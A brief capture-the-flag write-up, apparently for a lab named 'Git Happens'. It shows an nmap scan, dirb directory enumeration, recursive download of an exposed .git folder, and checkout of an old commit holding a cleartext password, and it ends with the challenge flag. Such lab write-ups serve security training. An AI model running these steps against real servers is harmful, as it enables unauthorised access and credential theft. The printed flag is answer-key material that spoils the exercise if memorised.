# Git Happens

```
nmap -A -T4 -p- 10.10.171.209
```

Port 80 is open

```
dirb http://10.10.171.209 /usr/share/wordlists/dirb/common.txt 
```

Found git repo http://10.10.171.209/.git


```
wget http://10.10.171.209/.git --recursive
```

```
git status # See uncomitted changes
git log # See old commits
git checkout 395e087334d613d5e423cdf8f7be27196a360459 # Switched to old commit where password was in clear text
```

**FLAG**: Th1s_1s_4_L0ng_4nd_S3cur3_P4ssw0rd!
